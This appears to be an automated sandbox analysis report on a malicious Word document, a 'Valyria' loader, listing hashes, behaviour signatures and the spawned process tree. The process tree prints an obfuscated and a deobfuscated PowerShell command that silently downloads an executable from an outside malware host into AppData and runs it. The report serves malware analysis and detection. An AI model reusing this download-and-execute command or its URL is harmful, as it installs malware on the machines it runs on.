Analysis

  • max time kernel
    8s
  • max time network
    11s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/10/2022, 09:40

General

  • Target

    8ffeab678d425795e55e0328ebf9685c5e2c2ec3d5094c0d88578a10d688c5a5.doc

  • Size

    79KB

  • MD5

    39de314ca12ec81359cbd1fabc12cb98

  • SHA1

    d23e18a068f0ffde1fe7dbffbfa86ef459e3ee57

  • SHA256

    8ffeab678d425795e55e0328ebf9685c5e2c2ec3d5094c0d88578a10d688c5a5

  • SHA512

    67eb2a93e509ec34999f21757069d0729d06146796253e198d0449f2dfa83568a290cf7397a628a7489e2958fe61a45a387a1d3517397a79499f07ea0adfca73

  • SSDEEP

    768:ixbpML2teJsNST+jBl8UDRxz99LHy85ZKYbkr+H/l7eYk3I:+M6ZNSTOl7DR31y8eYS+H/sj

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://newyeargoka.top/read.php?f=0.dat

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Valyria

    Malicious Word document which is a loader for other malware.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\8ffeab678d425795e55e0328ebf9685c5e2c2ec3d5094c0d88578a10d688c5a5.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:996
    • C:\Windows\SYSTEM32\cMd.eXE
      cMd.eXE /C "p^owe^Rs^heLL^.^ExE^ -eXECuTionPoLIC^y ^BY^p^A^Ss -nop^rO^Fi^Le^ ^-^w^iNDO^wSty^Le ^HI^dd^eN (^N^eW^-ob^JeC^t^ S^YSTEM^.N^ET.^WEbc^li^eNt).^Dow^nLOAdfI^LE^('http://newyeargoka.top/read.php?f=0.dat',^'%APPdaTa%.exE');St^Art-P^R^oCeS^S '%APPDaTA%.exe'"
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3956
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poweRsheLL.ExE -eXECuTionPoLICy BYpASs -noprOFiLe -wiNDOwStyLe HIddeN (NeW-obJeCt SYSTEM.NET.WEbclieNt).DownLOAdfILE('http://newyeargoka.top/read.php?f=0.dat','C:\Users\Admin\AppData\Roaming.exE');StArt-PRoCeSS 'C:\Users\Admin\AppData\Roaming.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1828

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/996-132-0x00007FF9A63F0000-0x00007FF9A6400000-memory.dmp

    Filesize

    64KB

  • memory/996-134-0x00007FF9A63F0000-0x00007FF9A6400000-memory.dmp

    Filesize

    64KB

  • memory/996-133-0x00007FF9A63F0000-0x00007FF9A6400000-memory.dmp

    Filesize

    64KB

  • memory/996-135-0x00007FF9A63F0000-0x00007FF9A6400000-memory.dmp

    Filesize

    64KB

  • memory/996-136-0x00007FF9A63F0000-0x00007FF9A6400000-memory.dmp

    Filesize

    64KB

  • memory/996-137-0x00007FF9A4260000-0x00007FF9A4270000-memory.dmp

    Filesize

    64KB

  • memory/996-138-0x00007FF9A4260000-0x00007FF9A4270000-memory.dmp

    Filesize

    64KB

  • memory/1828-141-0x0000027FCB010000-0x0000027FCB032000-memory.dmp

    Filesize

    136KB

  • memory/1828-142-0x00007FF9B9EB0000-0x00007FF9BA971000-memory.dmp

    Filesize

    10.8MB

  • memory/1828-143-0x00007FF9B9EB0000-0x00007FF9BA971000-memory.dmp

    Filesize

    10.8MB